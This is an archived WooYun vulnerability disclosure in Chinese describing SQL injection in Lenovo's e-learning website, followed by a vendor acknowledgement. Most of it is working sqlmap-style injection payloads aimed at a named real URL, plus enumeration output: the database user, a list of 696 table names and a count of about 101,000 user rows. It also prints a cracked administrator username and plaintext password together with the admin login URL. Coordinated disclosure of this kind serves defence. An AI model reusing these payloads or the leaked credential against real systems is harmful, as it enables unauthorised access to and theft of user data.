乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-27: 细节已通知厂商并且等待厂商处理中 2013-08-27: 厂商已经确认,细节仅向厂商公开 2013-09-06: 细节向核心白帽子及相关领域专家公开 2013-09-16: 细节向普通白帽子公开 2013-09-26: 细节向实习白帽子公开 2013-10-11: 细节向公众公开
漏洞好多哦,这次很幸运,不是盲注。
注射点:
http://e-learning.lenovo.com.cn/user/registration/ajax/group/3/shop/2777
最后一个参数存在注射漏洞
---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777 AND 4534=4534/ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777 AND (SELECT 2454 FROM(SELECT COUNT(*),CONCAT(0x71646d7071,(SELECT (CASE WHEN (2454=2454) THEN 1 ELSE 0 END)),0x7177767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)/ Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/-2768 UNION ALL SELECT CONCAT(0x71646d7071,0x456279506c5659574f6b,0x7177767a71)#/ Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777; SELECT SLEEP(5)-- / Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777 AND SLEEP(5)/---
web application technology: Apache 2.2.0, PHP 5.2.14back-end DBMS: MySQL 5.0
当前用户
current user: 'lenovo@%'
当前库
current database: 'lenovo'
696个表
Database: lenovo[696 tables]+-----------------------------------+| keys || active || active_type || active_up || active_up_user || active_user || ad_manage || admin_log || admin_users || am_news || area || area_cost || area_credits || area_main || area_photo || area_suggest || area_teacher || ask || ask_answer || ask_comment || ask_good || ask_score_detail || ask_search_keyword || ask_too || ask_user_reply_detail || assessquarter || autumnsurvey11 || autumnsurvey12 || bao_click_record || bao_click_record_20110829 || bao_click_record_201112 || bao_click_record_20120117 || bao_history || bao_map || bao_q_record || bao_q_record_20110829 || bao_q_record_20120109 || bao_q_record_20120117 || bao_record || bao_record_20110829 || bao_record_20120109 || bao_record_20120117 || bao_session || bbs_elearning_groups || bind_record || cdb_access || cdb_activities || cdb_activityapplies || cdb_addons || cdb_adminactions || cdb_admincustom || cdb_admingroups || cdb_adminnotes || cdb_adminsessions || cdb_advertisements || cdb_announcements || cdb_assessment || cdb_assessment_2011q1 || cdb_attachmentfields || cdb_attachments || cdb_attachpaymentlog || cdb_attachtypes || cdb_banned || cdb_bbcodes || cdb_caches || cdb_creditslog || cdb_crons || cdb_debateposts || cdb_debates || cdb_failedlogins || cdb_faqs || cdb_favoriteforums || cdb_favorites || cdb_favoritethreads || cdb_feeds || cdb_forumfields || cdb_forumlinks || cdb_forumrecommend || cdb_forums || cdb_imagetypes || cdb_invites || cdb_itempool || cdb_magiclog || cdb_magicmarket || cdb_magics || cdb_medallog || cdb_medals || cdb_memberfields || cdb_membermagics || cdb_memberrecommend || cdb_members || cdb_memberspaces || cdb_moderators || cdb_modworks || cdb_mytasks || cdb_navs || cdb_onlinelist || cdb_onlinetime || cdb_orders || cdb_paymentlog || cdb_pluginhooks || cdb_plugins || cdb_pluginvars || cdb_polloptions || cdb_polls || cdb_postposition || cdb_posts || cdb_profilefields || cdb_projects || cdb_promotions || cdb_prompt || cdb_promptmsgs || cdb_prompttype || cdb_ranks || cdb_ratelog || cdb_regips || cdb_relatedthreads || cdb_reportlog || cdb_request || cdb_rewardlog || cdb_rsscaches || cdb_searchindex || cdb_sessions || cdb_settings || cdb_smilies || cdb_spacecaches || cdb_stats || cdb_statvars || cdb_styles || cdb_stylevars || cdb_tags || cdb_tasks || cdb_taskvars || cdb_templates || cdb_threads || cdb_threadsmod || cdb_threadtags || cdb_threadtypes || cdb_tradecomments || cdb_tradelog || cdb_tradeoptionvars || cdb_trades || cdb_typemodels || cdb_typeoptions || cdb_typeoptionvars || cdb_typevars || cdb_uc_admins || cdb_uc_applications || cdb_uc_badwords || cdb_uc_domains || cdb_uc_failedlogins || cdb_uc_feeds || cdb_uc_friends || cdb_uc_mailqueue || cdb_uc_memberfields || cdb_uc_members || cdb_uc_mergemembers || cdb_uc_newpm || cdb_uc_notelist || cdb_uc_pms || cdb_uc_protectedmembers || cdb_uc_settings || cdb_uc_sqlcache || cdb_uc_tags || cdb_uc_vars || cdb_usergroups || cdb_validating || cdb_warnings || cdb_words || cmamonthshop || contest || control || control_type || course || course_record || course_record_log || course_type || courseware || courseware_comment || courseware_detail || courseware_survey || datum || datum_sort || dealer || dict_card_lc || dict_card_lz || dict_card_user || dict_card_zd || dict_shop || dict_sys_user || downfile || ec3_shop || ec3_user || exam_paper || exam_paper_keys || exam_paper_questions || extra_power || fy12q4cloth || gift_record || greensurvey12 || group_authoritys || groups || idea || idea_config || idea_config_bak || idea_forbid_log || idea_pic || idea_pw || idea_pw_vote || idea_vote || idea_vote_set || ideaother || ideaother_config || ideaother_forbid_log || ideaother_pic || ideaother_vote || ideaother_vote_set || ideaother_vote_set_copy || ideaother_voter || intel2_click_record || intel2_click_record_copy || intel2_click_record_new || intel2_history || intel2_map || intel2_map_copy || intel2_q_record || intel2_q_record_copy || intel2_record || intel2_record_copy || intel2_session || intel_click_record || intel_click_record_copy || intel_history || intel_map || intel_map_copy || intel_q_record || intel_record || intel_session || irep_course || irep_quiz || kaoshi || keysnew || lbs_case || lbs_case_config || lbs_weekly || lbsuserlist || leadvise || learning_record || learning_record_log || lesurvey || lphone_shops || match_config || match_gift || match_gift_record || match_pic || match_record || match_result || match_result_bak || match_score || match_top || match_top_bak || message || msmadvise || news || newtraining || notice || notice_board || notice_record || notice_record_2012 || notice_record_2013 || nplay_session || operations || order_detail || order_record || pad_address || pad_click_record || pad_history || pad_map || pad_q_record || pad_record || pad_record_copy || pad_session || place || positions || power || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_banned || pre_common_block || pre_common_block_favorite || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_pic || pre_common_block_style || pre_common_block_xml || pre_common_cache || pre_common_card || pre_common_card_log || pre_common_card_type || pre_common_connect_guest || pre_common_credit_log || pre_common_credit_log_field || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_devicetoken || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedlogin || pre_common_friendlink || pre_common_grouppm || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_action_log || pre_common_member_connect || pre_common_member_count || pre_common_member_crime || pre_common_member_field_forum || pre_common_member_field_home || pre_common_member_forum_buylog || pre_common_member_grouppm || pre_common_member_log || pre_common_member_magic || pre_common_member_medal || pre_common_member_newprompt || pre_common_member_profile || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_stat_field || pre_common_member_status || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_myapp || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_optimizer || pre_common_patch || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_relatedlink || pre_common_report || pre_common_searchindex || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_tag || pre_common_tagitem || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_visit || pre_common_word || pre_common_word_type || pre_connect_disktask || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_postfeedlog || pre_connect_tthreadlog || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachment_0 || pre_forum_attachment_1 || pre_forum_attachment_2 || pre_forum_attachment_3 || pre_forum_attachment_4 || pre_forum_attachment_5 || pre_forum_attachment_6 || pre_forum_attachment_7 || pre_forum_attachment_8 || pre_forum_attachment_9 || pre_forum_attachment_exif || pre_forum_attachment_unused || pre_forum_attachtype || pre_forum_bbcode || pre_forum_collection || pre_forum_collectioncomment || pre_forum_collectionfollow || pre_forum_collectioninvite || pre_forum_collectionrelated || pre_forum_collectionteamworker || pre_forum_collectionthread || pre_forum_creditslog || pre_forum_debate || pre_forum_debatepost || pre_forum_faq || pre_forum_filter_post || pre_forum_forum || pre_forum_forum_threadtable || pre_forum_forumfield || pre_forum_forumrecommend || pre_forum_groupcreditslog || pre_forum_groupfield || pre_forum_groupinvite || pre_forum_grouplevel || pre_forum_groupuser || pre_forum_hotreply_member || pre_forum_hotreply_number || pre_forum_imagetype || pre_forum_medal || pre_forum_medallog || pre_forum_memberrecommend || pre_forum_moderator || pre_forum_modwork || pre_forum_newthread || pre_forum_onlinelist || pre_forum_order || pre_forum_poll || pre_forum_polloption || pre_forum_polloption_image || pre_forum_pollvoter || pre_forum_post || pre_forum_post_location || pre_forum_post_moderate || pre_forum_post_tableid || pre_forum_postcache || pre_forum_postcomment || pre_forum_postlog || pre_forum_poststick || pre_forum_promotion || pre_forum_ratelog || pre_forum_relatedthread || pre_forum_replycredit || pre_forum_rsscache || pre_forum_sofa || pre_forum_spacecache || pre_forum_statlog || pre_forum_thread || pre_forum_thread_moderate || pre_forum_threadaddviews || pre_forum_threadcalendar || pre_forum_threadclass || pre_forum_threadclosed || pre_forum_threaddisablepos || pre_forum_threadhot || pre_forum_threadimage || pre_forum_threadlog || pre_forum_threadmod || pre_forum_threadpartake || pre_forum_threadpreview || pre_forum_threadprofile || pre_forum_threadprofile_group || pre_forum_threadrush || pre_forum_threadtype || pre_forum_trade || pre_forum_tradecomment || pre_forum_tradelog || pre_forum_typeoption || pre_forum_typeoptionvar || pre_forum_typevar || pre_forum_warning || pre_home_album || pre_home_album_category || pre_home_appcreditlog || pre_home_blacklist || pre_home_blog || pre_home_blog_category || pre_home_blog_moderate || pre_home_blogfield || pre_home_class || pre_home_click || pre_home_clickuser || pre_home_comment || pre_home_comment_moderate || pre_home_docomment || pre_home_doing || pre_home_doing_moderate || pre_home_favorite || pre_home_feed || pre_home_feed_app || pre_home_follow || pre_home_follow_feed || pre_home_follow_feed_archiver || pre_home_friend || pre_home_friend_request || pre_home_friendlog || pre_home_notification || pre_home_pic || pre_home_pic_moderate || pre_home_picfield || pre_home_poke || pre_home_pokearchive || pre_home_share || pre_home_share_moderate || pre_home_show || pre_home_specialuser || pre_home_userapp || pre_home_userappfield || pre_home_visitor || pre_mobile_setting || pre_portal_article_content || pre_portal_article_count || pre_portal_article_moderate || pre_portal_article_related || pre_portal_article_title || pre_portal_article_trash || pre_portal_attachment || pre_portal_category || pre_portal_category_permission || pre_portal_comment || pre_portal_comment_moderate || pre_portal_rsscache || pre_portal_topic || pre_portal_topic_pic || pre_security_evilpost || pre_security_eviluser || pre_security_failedlog || pre_ucenter_admins || pre_ucenter_applications || pre_ucenter_badwords || pre_ucenter_domains || pre_ucenter_failedlogins || pre_ucenter_feeds || pre_ucenter_friends || pre_ucenter_mailqueue || pre_ucenter_memberfields || pre_ucenter_members || pre_ucenter_mergemembers || pre_ucenter_newpm || pre_ucenter_notelist || pre_ucenter_pm_indexes || pre_ucenter_pm_lists || pre_ucenter_pm_members || pre_ucenter_pm_messages_0 || pre_ucenter_pm_messages_1 || pre_ucenter_pm_messages_2 || pre_ucenter_pm_messages_3 || pre_ucenter_pm_messages_4 || pre_ucenter_pm_messages_5 || pre_ucenter_pm_messages_6 || pre_ucenter_pm_messages_7 || pre_ucenter_pm_messages_8 || pre_ucenter_pm_messages_9 || pre_ucenter_protectedmembers || pre_ucenter_settings || pre_ucenter_sqlcache || pre_ucenter_tags || pre_ucenter_vars || province || quarter || questions || questions_box || questions_detail || quiz || rka_case || rka_course_list || rka_summary_periods || rka_talk || rka_talk_cate || rka_talk_copy || rka_talk_periods || rka_talk_vote || rka_talk_vote_log || rka_train || rka_train_periods || rka_train_summary || rka_train_summary_pic || rka_train_users || rka_train_vote || rkalevel || rkauserlist || salestalk || salestalk_num || scadvise || share || share_record || share_record_2012 || share_record_2013 || shop_cma201202 || shop_cma201202_bak || shop_target || shopforum94 || shopforum94_list || shopforum94_list_temp2 || shopforum94top || shops || shops_copy201301112 || shops_copy201301113 || shops_flagship || shops_level || shops_seller || shops_seller20121111 || shops_seller20121122 || shouke || springsurvey12 || springsurvey13 || ss_log || star || summer_13_user || summer_13_user_copy || summercloth || summersurvey12 || summersurvey13 || super_sales || survey || survey25qa || survey_notice || survey_option || survey_option_title || survey_vote || t_train_file || task2_answer || task2_list || task2_manager || task2_mark || task2_que || task2_question1 || task2_status || task2_user || task_answer || task_list || task_manager || task_mark || task_que || task_question31 || task_status || task_user || teacher_info || teacher_train || test_1 || test_1_1377186040 || test_type || testing || think_advise || think_tmp || tmp_idea_user || tmp_user || train_file || trainsxdr || tree_area || tree_channel || tree_shoptype || tree_staff_type || txzquserlist || upgrade_user || user_advise || user_check || user_credits || user_credits_record || user_department || user_lenovo_kaoshi || userforum93 || users || users_20120802 || users_20121227copy || users_copy20130730 || users_rka || usersbaoming || usersbaomingbiaotmp || usersbaominginfo || usersbaomingtmp || userskaoshi || userskaoshi_bak || userskaoshitmp || userskaoshitmp_bak || verify_date || verify_history || wintercloth || wintersurvey11 || wintersurvey12 || yellowadvise || yellowsurvey11 || ytadvise |+-----------------------------------+
看看用户表里的数据
Database: lenovo+-------+---------+| Table | Entries |+-------+---------+| users | 101227 |+-------+---------+
然后dump了管理员表,第一个md5解开了,成功进入后台用户名:admin 密码:lenovoadmin2010http://e-learning.lenovo.com.cn/admin/index
过滤吧 弱密码也改改
危害等级:高
漏洞Rank:20
确认时间:2013-08-27 13:59
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无